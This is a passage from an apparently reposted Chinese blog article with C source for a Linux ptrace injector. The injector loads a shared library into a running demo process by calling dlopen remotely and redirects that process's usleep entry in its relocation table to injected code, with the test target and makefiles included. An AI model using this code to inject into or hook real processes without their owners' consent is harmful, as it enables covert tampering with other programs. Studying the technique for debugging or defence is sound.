  686. 		PROCESSREAD(phdr,modbase+ehdr->e_phoff+(i*ehdr->e_phentsize),sizeof(Elf32_Phdr));
  687. 		//printphdr(phdr);
  688. 		if(PT_DYNAMIC==phdr->p_type){
  689. 			offsetdyn = phdr->p_vaddr;
  690. 			dynsize = phdr->p_memsz;
  691. 			free(ehdr);
  692. 			free(phdr);
  693. 			if(offsetdyn<0x08000000)return modbase+offsetdyn;
  694. 			return offsetdyn;
  695. 		}
  696. 	}
  697. 	return 0; 
  698. } 
  699. int main(int argc, char *argv[])
  700. {
  701. 	long pid;
  702. 	struct link_map *map;
  703. 	char sym_name[256];
  704. 	unsigned long sym_addr;
  705. 	unsigned long new_addr, old_addr, rel_addr;
  706. 	int ch;
  707. 	char soname[256];
  708. 	char *pchar;
  709. 	char search_mode = 's';	/* 's' - symbol table, 'h' - hash table */
  710. 	char print_flag = 'n';
  711.  
  712. 	strcpy(soname, (char *) get_current_dir_name());
  713. 	strcat(soname, "/so.so");	/* default shared library */
  714. 	
  715. 	printf("soname:%s\n",soname); 
  716.  
  717.     pid = find_pid_of("./loop");
  718. 	  
  719.     
  720. 	ptrace_attach(pid);
  721.  
  722. 	printf("pid=%d\n",pid);
  723. 	//int mmapaddress=enumprocesssym(pid,"libc","mmap");
  724. 	//printf("mmap=%x\n",mmapaddress);	 
  725.  
  726. 	void  *dlopen_addr;
  727. //	void* handle = dlopen( "/lib/i386-linux-gnu/libdl-2.19.so",RTLD_NOW| RTLD_GLOBAL);
  728. //	void*addr = dlsym(handle,"dlopen");
  729. 	dlopen_addr = enumprocesssym( pid, "libdl", "dlopen" );
  730.  
  731. 	printf("dlopen_addr  = %x\n", dlopen_addr);
  732. 	call_dlopen(pid, dlopen_addr, soname);
  733. 	
  734. 	void* newput = enumprocesssym( pid, soname, "newput" );
  735. 	call_newput(pid,newput,"wangjinrong");
  736. 	
  737.  
  738. 	 
  739. 	sym_addr = enumprocesssym(pid, soname, "newusleep");
  740. 	printf("sym_addr=%x\n",sym_addr);
  741. 	
  742. 	 
  743. 	int dynbaseaddr=enumprocrel(pid,"loop");
  744. 	printf("dynbaseaddr=%x\n",dynbaseaddr);
  745. 	
  746. 	rel_addr = find_sym_in_rel2(pid,"usleep",dynbaseaddr);
  747. 	printf("rel_addr=%x\n",rel_addr);
  748. 	 
  749. 	old_addr = enumprocesssym(pid, soname, "oldusleep");
  750. 	printf("old_addr=%x\n",old_addr);
  751. 	 
  752.  
  753. 	 
  754. 	ptrace_read(pid, rel_addr, &new_addr, sizeof(new_addr));
  755. 	 
  756. 	ptrace_write(pid, old_addr, &new_addr, sizeof(new_addr));
  757. 	ptrace_write(pid, rel_addr, &sym_addr, sizeof(sym_addr));	 
  758.  
  759.  
  760. 	ptrace_detach(pid);
  761. 	
  762.  
  763. 	exit(0);
  764. }
  765.

s.c

  1. #include <stdlib.h>
  2. #include <stdio.h>
  3. #include <string.h>
  4. #include <unistd.h>
  5. #include <sys/ptrace.h>
  6. #include <wait.h>
  7. #include <sys/user.h>
  8. #include <errno.h>
  9. #include <stdlib.h>
  10. #include <string.h>
  11. #include <stdio.h>
  12. #include <elf.h>
  13. #include <link.h> 
  14. #include <sys/wait.h>
  15. #include <sys/mman.h>
  16. #include <dlfcn.h>
  17. #include <dirent.h>
  18. #include <unistd.h> 
  19. void* get_module_base(pid_t pid, const char* module_name)
  20. {
  21.     FILE *fp;
  22.     long addr = 0;
  23.     char *pch;
  24.     char filename[32];
  25.     char line[1024];
  26.  
  27.     if (pid < 0) {
  28.         /* self process */
  29.         snprintf(filename, sizeof(filename), "/proc/self/maps", pid);
  30.     } else {
  31.         snprintf(filename, sizeof(filename), "/proc/%d/maps", pid);
  32.     }
  33.  
  34.     fp = fopen(filename, "r");
  35.  
  36.     if (fp != NULL) {
  37.         while (fgets(line, sizeof(line), fp)) {
  38.             if (strstr(line, module_name)) {
  39.                 pch = strtok( line, "-" );
  40.                 addr = strtoul( pch, NULL, 16 );
  41.  
  42.                 if (addr == 0x8000)
  43.                     addr = 0;
  44.  
  45.                 break;
  46.             }
  47.         }
  48.  
  49.         fclose(fp) ;
  50.     }
  51.  
  52.     return (void *)addr;
  53. }
  54.  
  55.  
  56. int find_pid_of(const char *process_name)
  57. {
  58.     int id;
  59.     pid_t pid = -1;
  60.     DIR* dir;
  61.     FILE *fp;
  62.     char filename[32];
  63.     char cmdline[256];
  64.  
  65.     struct dirent * entry;
  66.  
  67.     if (process_name == NULL)
  68.         return -1;
  69.  
  70.     dir = opendir("/proc");
  71.     if (dir == NULL)
  72.         return -1;
  73.  
  74.     while((entry = readdir(dir)) != NULL) {
  75.         id = atoi(entry->d_name);
  76.         if (id != 0) {
  77.             sprintf(filename, "/proc/%d/cmdline", id);
  78.             fp = fopen(filename, "r");
  79.             if (fp) {
  80.                 fgets(cmdline, sizeof(cmdline), fp);
  81.                 fclose(fp);
  82.  
  83.                 if (strcmp(process_name, cmdline) == 0)	{
  84.                     /* process found */
  85.                     pid = id;
  86.                     break;
  87.                 }
  88.             }
  89.         }
  90.     }
  91.  
  92.     closedir(dir);
  93.     return pid;
  94. }
  95. void* get_remote_addr(pid_t target_pid, const char* module_name, char* fnname)
  96. {
  97.     void* local_handle, *remote_handle;
  98. 	void* local_addr;
  99. 	void* handle = dlopen( "/lib/i386-linux-gnu/libdl-2.19.so",RTLD_NOW| RTLD_GLOBAL);
  100. 	local_addr = dlsym(handle,fnname);
  101.     local_handle = get_module_base(-1, module_name);
  102.     remote_handle = get_module_base(target_pid, module_name);
  103.  
  104.     printf("[+] get_remote_addr: local[%x], remote[%x] local_addr[%x]\n", local_handle, remote_handle,local_addr);
  105.  
  106.     void * ret_addr = (void *)((uint32_t)local_addr  - (uint32_t)local_handle)+ (uint32_t)remote_handle;
  107.  
  108.     return ret_addr;
  109. }
  110. #define PRINT(a,ehdr) printf(#a"=%x\n",ehdr->a);
  111. #define PRINTA4(a,ehdr) printf(#a"=%2.2x %c%c%c\n",ehdr->a[0],ehdr->a[1],ehdr->a[2],ehdr->a[3]);
  112. void printehdr(Elf32_Ehdr *ehdr)
  113. {
  114. 	puts("---------------------------");
  115. 	PRINTA4(e_ident,ehdr)
  116. 	PRINT(e_type,ehdr)
  117. 	PRINT(e_machine,ehdr)
  118. 	PRINT(e_version,ehdr)
  119. 	PRINT(e_entry,ehdr)
  120. 	PRINT(e_phoff,ehdr)
  121. 	PRINT(e_shoff,ehdr)
  122. 	PRINT(e_flags,ehdr)
  123. 	PRINT(e_ehsize,ehdr)
  124. 	PRINT(e_phentsize,ehdr)
  125. 	PRINT(e_phnum,ehdr)
  126. 	PRINT(e_shentsize,ehdr)
  127. 	PRINT(e_shnum,ehdr)
  128. 	PRINT(e_shstrndx,ehdr)
  129. 	printf("ehsize=%x phsize=%x shsize=%x\n",sizeof(Elf32_Ehdr),sizeof(Elf32_Phdr),sizeof(Elf32_Shdr));
  130. 	
  131. }
  132.  
  133. #define PRINTSWITCH(a,type) if(a==type){puts(#a);return;}
  134. void printptype(int type)
  135. {
  136. 	PRINTSWITCH(PT_NULL,type)
  137. 	PRINTSWITCH(PT_LOAD,type)
  138. 	PRINTSWITCH(PT_DYNAMIC,type)
  139. 	PRINTSWITCH(PT_INTERP,type)
  140. 	PRINTSWITCH(PT_NOTE,type)
  141. 	PRINTSWITCH(PT_SHLIB,type)
  142. 	PRINTSWITCH(PT_PHDR,type)
  143. 	PRINTSWITCH(PT_TLS,type)
  144. 	PRINTSWITCH(PT_NUM,type)
  145. 	PRINTSWITCH(PT_LOOS,type)
  146. 	PRINTSWITCH(PT_GNU_EH_FRAME,type)
  147. 	PRINTSWITCH(PT_GNU_STACK,type)
  148. 	PRINTSWITCH(PT_GNU_RELRO,type)
  149. 	PRINTSWITCH(PT_LOSUNW,type)
  150. 	PRINTSWITCH(PT_SUNWBSS,type)
  151. 	PRINTSWITCH(PT_SUNWSTACK,type)
  152. 	PRINTSWITCH(PT_HISUNW,type)
  153. 	PRINTSWITCH(PT_HIOS,type)
  154. 	PRINTSWITCH(PT_LOPROC,type)
  155. 	PRINTSWITCH(PT_HIPROC,type)
  156. }
  157. void printphdr(Elf32_Phdr *phdr)
  158. {
  159. 	puts("---------------------------");
  160. 	printptype(phdr->p_type);
  161. 	PRINT(p_type,phdr)
  162. 	PRINT(p_offset,phdr)
  163. 	PRINT(p_vaddr,phdr)
  164. 	PRINT(p_paddr,phdr)
  165. 	PRINT(p_filesz,phdr)
  166. 	PRINT(p_memsz,phdr)
  167. 	PRINT(p_flags,phdr)
  168. 	PRINT(p_align,phdr) 
  169. }
  170. void printdyntag(int d_tag)
  171. {
  172. 	PRINTSWITCH(DT_NULL,d_tag)
  173. 	PRINTSWITCH(DT_NEEDED,d_tag)
  174. 	PRINTSWITCH(DT_PLTRELSZ,d_tag)
  175. 	PRINTSWITCH(DT_PLTGOT,d_tag)
  176. 	PRINTSWITCH(DT_HASH,d_tag)
  177. 	PRINTSWITCH(DT_STRTAB,d_tag)
  178. 	PRINTSWITCH(DT_SYMTAB,d_tag)		
  179. 	PRINTSWITCH(DT_RELA,d_tag)
  180. 	PRINTSWITCH(DT_RELASZ,d_tag)
  181. 	PRINTSWITCH(DT_RELAENT,d_tag)
  182. 	PRINTSWITCH(DT_STRSZ,d_tag)
  183. 	PRINTSWITCH(DT_SYMENT,d_tag)
  184. 	PRINTSWITCH(DT_INIT,d_tag)
  185. 	PRINTSWITCH(DT_FINI,d_tag)
  186. 	PRINTSWITCH(DT_SONAME,d_tag)
  187. 	PRINTSWITCH(DT_RPATH,d_tag)
  188. 	PRINTSWITCH(DT_SYMBOLIC,d_tag)
  189. 	PRINTSWITCH(DT_REL,d_tag)
  190. 	PRINTSWITCH(DT_RELSZ,d_tag)
  191. 	PRINTSWITCH(DT_RELENT,d_tag)
  192. 	PRINTSWITCH(DT_PLTREL,d_tag)
  193. 	PRINTSWITCH(DT_DEBUG,d_tag)
  194. 	PRINTSWITCH(DT_TEXTREL,d_tag)
  195. 	PRINTSWITCH(DT_JMPREL,d_tag)
  196. 	PRINTSWITCH(DT_BIND_NOW,d_tag)
  197. 	PRINTSWITCH(DT_INIT_ARRAY,d_tag)
  198. 	PRINTSWITCH(DT_FINI_ARRAY,d_tag)	
  199. 	PRINTSWITCH(DT_INIT_ARRAYSZ,d_tag)
  200. 	PRINTSWITCH(DT_FINI_ARRAYSZ,d_tag)
  201. 	PRINTSWITCH(DT_RUNPATH,d_tag)
  202. 	PRINTSWITCH(DT_FLAGS,d_tag)
  203. 	PRINTSWITCH(DT_ENCODING,d_tag)
  204. 	PRINTSWITCH(DT_PREINIT_ARRAY,d_tag)
  205. 	PRINTSWITCH(DT_PREINIT_ARRAYSZ,d_tag)
  206. 	PRINTSWITCH(DT_NUM,d_tag)
  207. 	PRINTSWITCH(DT_LOOS,d_tag)
  208. 	PRINTSWITCH(DT_HIOS,d_tag)
  209. 	PRINTSWITCH(DT_LOPROC,d_tag)
  210. 	PRINTSWITCH(DT_HIPROC,d_tag)
  211. 	PRINTSWITCH(DT_PROCNUM,d_tag)
  212. 	PRINTSWITCH(DT_VALRNGLO,d_tag)
  213. 	PRINTSWITCH(DT_GNU_PRELINKED,d_tag)
  214. 	PRINTSWITCH(DT_GNU_CONFLICTSZ,d_tag)
  215. 	PRINTSWITCH(DT_GNU_LIBLISTSZ,d_tag)
  216. 	PRINTSWITCH(DT_CHECKSUM,d_tag)
  217. 	PRINTSWITCH(DT_PLTPADSZ,d_tag)
  218. 	PRINTSWITCH(DT_MOVEENT,d_tag)	 	
  219. 	PRINTSWITCH(DT_MOVESZ,d_tag)
  220. 	PRINTSWITCH(DT_FEATURE_1,d_tag)
  221. 	PRINTSWITCH(DT_POSFLAG_1,d_tag)
  222. 	PRINTSWITCH(DT_SYMINSZ,d_tag)
  223. 	PRINTSWITCH(DT_SYMINENT,d_tag)
  224. 	PRINTSWITCH(DT_VALRNGHI,d_tag)
  225. 	PRINTSWITCH(DT_ADDRRNGLO,d_tag)
  226. 	PRINTSWITCH(DT_GNU_HASH,d_tag)	
  227. 	PRINTSWITCH(DT_TLSDESC_PLT,d_tag)	
  228. 	PRINTSWITCH(DT_TLSDESC_GOT,d_tag)	
  229. 	PRINTSWITCH(DT_GNU_CONFLICT,d_tag)	
  230. 	PRINTSWITCH(DT_GNU_LIBLIST,d_tag)	
  231. 	PRINTSWITCH(DT_CONFIG,d_tag)	
  232. 	PRINTSWITCH(DT_DEPAUDIT,d_tag)	
  233. 	PRINTSWITCH(DT_AUDIT,d_tag)	
  234. 	PRINTSWITCH(DT_PLTPAD,d_tag)	
  235. 	PRINTSWITCH(DT_MOVETAB,d_tag)	
  236. 	PRINTSWITCH(DT_SYMINFO,d_tag)	
  237. 	PRINTSWITCH(DT_ADDRRNGHI,d_tag)	
  238. 	PRINTSWITCH(DT_ADDRNUM,d_tag)	
  239. 	PRINTSWITCH(DT_VERSYM,d_tag)	
  240. 	PRINTSWITCH(DT_RELACOUNT,d_tag)	
  241. 	PRINTSWITCH(DT_RELCOUNT,d_tag)	
  242. 	PRINTSWITCH(DT_FLAGS_1,d_tag)	
  243. 	PRINTSWITCH(DT_VERDEF,d_tag)	
  244. 	PRINTSWITCH(DT_VERDEFNUM,d_tag)			
  245. 	PRINTSWITCH(DT_VERNEED,d_tag)
  246. 	PRINTSWITCH(DT_VERNEEDNUM,d_tag)			
  247. 	PRINTSWITCH(DT_VERSIONTAGNUM,d_tag)	
  248. 	PRINTSWITCH(DT_AUXILIARY,d_tag)	
  249. 	PRINTSWITCH(DT_FILTER,d_tag)			
  250. 	PRINTSWITCH(DT_EXTRANUM,d_tag) 
  251. }
  252. void printdyn(Elf32_Dyn* dyn)
  253. {
  254. 	puts("---------------------------");
  255. 	printdyntag(dyn->d_tag);
  256. 	PRINT(d_tag,dyn)
  257. 	PRINT(d_un.d_val,dyn)
  258. }
  259. void printsym(Elf32_Sym *sym,int straddr)
  260. {
  261. 	puts("---------------------------");
  262.  	char sname[40];
  263. 	memcpy(sname,straddr+sym->st_name,40);
  264. 	if(sym->st_name)puts(straddr+sym->st_name);
  265. 	PRINT(st_name,sym)
  266. 	PRINT(st_value,sym)	
  267. 	PRINT(st_size,sym)
  268. 	PRINT(st_info,sym)
  269. 	PRINT(st_other,sym)
  270. 	PRINT(st_shndx,sym)
  271. }
  272. void printlinkmap(struct link_map*lm)
  273. {
  274. 	puts("---------------");
  275. 	PRINT(l_addr,lm)
  276. 	PRINT(l_ld,lm)	
  277. 	puts(lm->l_name);
  278. }
  279. int enumprocesssym(int pid,const char*libname,const char*fnname)
  280. {
  281. 	unsigned long modbase = (unsigned long)get_module_base(pid,libname);
  282.     unsigned long phdr_addr,shdr_addr, dyn_addr;
  283. 	int i;
  284. 	if(modbase==0){
  285. 		printf("%d[%s] get_module_base=0",pid,libname);
  286. 		return;
  287. 	}
  288. 	printf("modbase=%x\n",modbase);
  289. 	Elf32_Ehdr *ehdr = (Elf32_Ehdr *) malloc(sizeof(Elf32_Ehdr));
  290. 	Elf32_Phdr *phdr = (Elf32_Phdr *) malloc(sizeof(Elf32_Phdr));
  291. 	Elf32_Shdr *shdr = (Elf32_Shdr *) malloc(sizeof(Elf32_Shdr));
  292. 	Elf32_Dyn *dyn = (Elf32_Dyn *) malloc(sizeof(Elf32_Dyn));
  293. 	Elf32_Sym *sym = (Elf32_Sym *) malloc(sizeof(Elf32_Sym));
  294. 	
  295. 	struct link_map* linknode = (struct link_map*)malloc(sizeof(struct link_map));
  296. 	
  297. 	//ptrace_read(pid, (void*)modbase, ehdr, sizeof(Elf32_Ehdr));
  298. 	memcpy(ehdr,modbase,sizeof(Elf32_Ehdr));
  299. 	printehdr(ehdr);
  300. 	int offsetdyn =0;
  301. 	int dynsize = 0;
  302. 	for(i=0;i<ehdr->e_phnum;i++){
  303. 		memcpy(phdr,modbase+ehdr->e_phoff+(i*ehdr->e_phentsize),sizeof(Elf32_Phdr));
  304. 		printphdr(phdr);
  305. 		if(PT_DYNAMIC==phdr->p_type){
  306. 			offsetdyn = phdr->p_vaddr;
  307. 			dynsize = phdr->p_memsz;
  308. 		}
  309. 	}
  310. 	int symaddr=0;
  311. 	int symsize=0;
  312. 	int straddr=0;
  313. 	int gotaddr=0;
  314. 	int mapaddr=0;
  315. 	
  316. 	for(i=0;i<dynsize/sizeof(Elf32_Dyn);i++){
  317. 		memcpy(dyn,modbase+offsetdyn+(i*sizeof(Elf32_Dyn)),sizeof(Elf32_Dyn));
  318. 		printdyn(dyn);
  319. 		if(DT_SYMTAB==dyn->d_tag){
  320. 			symaddr = dyn->d_un.d_val;
  321. 		}else if(DT_STRTAB==dyn->d_tag){
  322. 			straddr=dyn->d_un.d_val;
  323. 		}else if(DT_PLTGOT==dyn->d_tag){
  324. 			gotaddr=dyn->d_un.d_val;
  325. 		}
  326. 	}
  327. 	for(i=0;;i++){
  328. 		memcpy(sym,symaddr+(i*sizeof(Elf32_Sym)),sizeof(Elf32_Sym));
  329. 		printsym(sym,straddr);		
  330.  
  331. 		if(sym->st_name){
  332. 			char sname[40];
  333. 			memcpy(sname,straddr+sym->st_name,40);
  334. 			if(!strcmp(sname,fnname)){
  335. 				return modbase+sym->st_value;
  336. 			}
  337. 		}
  338. 	}	
  339. 	return 0;
  340. 	Elf32_Addr gotv=0;
  341. 	puts("----got------");
  342. 	int linknodeaddr=0;
  343. 	for(i=0;i<60;i++){
  344. 		memcpy(&gotv,gotaddr+(i*sizeof(Elf32_Addr)),sizeof(Elf32_Addr));
  345. 		printf("%x\n",gotv);	
  346. 		if(gotv==0)break;
  347. 		if(i==1)mapaddr=gotv;
  348. 	}		
  349. 	i=0;
  350. 	int laddr = mapaddr;
  351. 	while(1)
  352. 	{
  353. 		memcpy(linknode,laddr,sizeof(struct link_map));
  354. 		//printlinkmap(linknode);
  355. 		if(linknode->l_next==0)break;
  356. 		laddr = linknode->l_next;
  357. 	}
  358. 	while(1)
  359. 	{
  360. 		memcpy(linknode,laddr,sizeof(struct link_map));
  361. 		printlinkmap(linknode);
  362. 		if(linknode->l_prev==0)break;
  363. 		laddr = linknode->l_prev;
  364. 	}	
  365. 	return;
  366.  
  367. }
  368. void	printrel(Elf32_Rel*rel,int straddr,int symaddr)
  369. {
  370. 	printf("-----rel------\n");
  371. 		PRINT(r_offset,rel)
  372. 	    PRINT(r_info,rel)  
  373. 	//PRINTSWITCH(DT_NULL,d_tag)
  374. }
  375. int g_symtab=0,g_strtab=0,g_jmprel=0,g_totalrelsize=0,g_relsize=0,g_nrels=0;
  376. void get_dyn_info(int pid,int dynaddr)
  377. {
  378. 	Elf32_Dyn *dyn = (Elf32_Dyn *) malloc(sizeof(Elf32_Dyn));
  379. 	int i = 0;
  380.  
  381. 	memcpy( dyn,dynaddr + i * sizeof(Elf32_Dyn), sizeof(Elf32_Dyn));
  382. 	i++;
  383. 	while (dyn->d_tag) {
  384. 		switch (dyn->d_tag) {
  385. 		case DT_SYMTAB:
  386. 			puts("DT_SYMTAB");
  387. 			g_symtab = dyn->d_un.d_ptr;
  388. 			break;
  389. 		case DT_STRTAB:
  390. 			g_strtab = dyn->d_un.d_ptr;
  391. 			puts("DT_STRTAB");
  392. 			break;
  393. 		case DT_JMPREL:
  394. 			g_jmprel = dyn->d_un.d_ptr;
  395. 			puts("DT_JMPREL");
  396. 			//printf("jmprel\t %p\n", g_jmprel);
  397. 			break;
  398. 		case DT_PLTRELSZ:
  399. 			g_totalrelsize = dyn->d_un.d_val;
  400. 			puts("DT_PLTRELSZ");
  401. 			break;
  402. 		case DT_RELAENT:
  403. 			g_relsize = dyn->d_un.d_val;
  404. 			puts("DT_RELAENT");
  405. 			break;
  406. 		case DT_RELENT:
  407. 			g_relsize = dyn->d_un.d_val;
  408. 			puts("DT_RELENT");
  409. 			break;
  410. 		}
  411.  
  412. 		memcpy(dyn, dynaddr + i * sizeof(Elf32_Dyn), sizeof(Elf32_Dyn));
  413. 		i++;
  414. 	}
  415.  
  416. 	g_nrels = g_totalrelsize / g_relsize;
  417.  
  418. 	free(dyn);
  419. 	printf("ok g_nrels=%d\n",g_nrels);
  420. }
  421. unsigned long find_sym_in_rel(int pid, char *sym_name,int dynaddr)
  422. {
  423. 	Elf32_Rel *rel = (Elf32_Rel *) malloc(sizeof(Elf32_Rel));
  424. 	Elf32_Sym *sym = (Elf32_Sym *) malloc(sizeof(Elf32_Sym));
  425. 	int i;	 
  426. 	unsigned long ret;
  427. 	char str[50];
  428.  
  429. 	get_dyn_info(pid,dynaddr);
  430. 	for (i = 0; i < g_nrels; i++) {
  431. 		memcpy(rel, (unsigned long) (g_jmprel + i * sizeof(Elf32_Rel)),sizeof(Elf32_Rel));
  432. 		if (ELF32_R_SYM(rel->r_info)) {
  433. 			memcpy(sym,g_symtab + ELF32_R_SYM(rel->r_info) * sizeof(Elf32_Sym),  sizeof(Elf32_Sym));
  434. 			memcpy(str,g_strtab + sym->st_name,50);
  435. 			if (strcmp(str, sym_name) == 0) {				 
  436. 				break;
  437. 			}			 
  438. 		}
  439. 	}
  440.  
  441. 	if (i == g_nrels)
  442. 		ret = 0;
  443. 	else
  444. 		ret = rel->r_offset;
  445.  
  446. 	free(rel);
  447. 	free(sym);
  448.  
  449. 	return ret;
  450. }
  451.  
  452. int enumprocrel(int pid,const char*libname)
  453. {
  454. 	unsigned long modbase = (unsigned long)get_module_base(pid,libname);
  455.     unsigned long phdr_addr,shdr_addr, dyn_addr;
  456. 	int i;
  457. 	if(modbase==0){
  458. 		printf("%d[%s] get_module_base=0\n",pid,libname);
  459. 		return;
  460. 	}
  461. 	printf("modbase=%x\n",modbase);
  462. 	Elf32_Ehdr *ehdr = (Elf32_Ehdr *) malloc(sizeof(Elf32_Ehdr));
  463. 	Elf32_Phdr *phdr = (Elf32_Phdr *) malloc(sizeof(Elf32_Phdr));
  464.  	
  465. 	//ptrace_read(pid, (void*)modbase, ehdr, sizeof(Elf32_Ehdr));
  466. 	memcpy(ehdr,modbase,sizeof(Elf32_Ehdr));
  467. 	printehdr(ehdr);
  468. 	int offsetdyn =0;
  469. 	int dynsize = 0;
  470. 	for(i=0;i<ehdr->e_phnum;i++){
  471. 		memcpy(phdr,modbase+ehdr->e_phoff+(i*ehdr->e_phentsize),sizeof(Elf32_Phdr));
  472. 		printphdr(phdr);
  473. 		if(PT_DYNAMIC==phdr->p_type){
  474. 			offsetdyn = phdr->p_vaddr;
  475. 			dynsize = phdr->p_memsz;
  476. 			free(ehdr);
  477. 			free(phdr);
  478. 			if(offsetdyn<0x08000000)return modbase+offsetdyn;
  479. 			return offsetdyn;
  480. 		}
  481. 	}
  482. 	return 0; 
  483. } 
  484. int main(int argc, char *argv[])
  485. {
  486. 	int c=0;
  487. 	usleep(10000);
  488. 	//void * handle = dlopen("/home/user1/injectso/inject/so.so",RTLD_NOW| RTLD_GLOBAL);	
  489. 	//printf("handle = %x\n",handle);
  490. 	int address=enumprocrel(-1,"loop");
  491. 	printf("address=%x\n",address);
  492. 	int sleeprel=find_sym_in_rel(-1,"usleep",address);
  493. 	printf("address=%x sleeprel=%x\n",address,sleeprel);
  494.  
  495. 	 
  496. 	while(1)usleep(1000000);
  497. 	 
  498. 	return 0;
  499. }

makefile

  1. all: hook so
  2. hook:
  3. 	gcc -o hook hook.c p_dbg.c p_elf.c  -ldl
  4. so:
  5. 	gcc -shared -o so.so -fPIC so.c -nostdlib -lpthread
  6. clean:
  7. 	rm hook
  8. 	rm so.so
  9. 	rm *~

  1. all:
  2. 	gcc -o loop s.c  -ldl
  3. 	 
  4. clean:
  5. 	rm loop 
  6. 	rm *~

代码下载地址

http://download.csdn.net/detail/q123456789098/9609159

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/人工智能uu/article/detail/872334
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号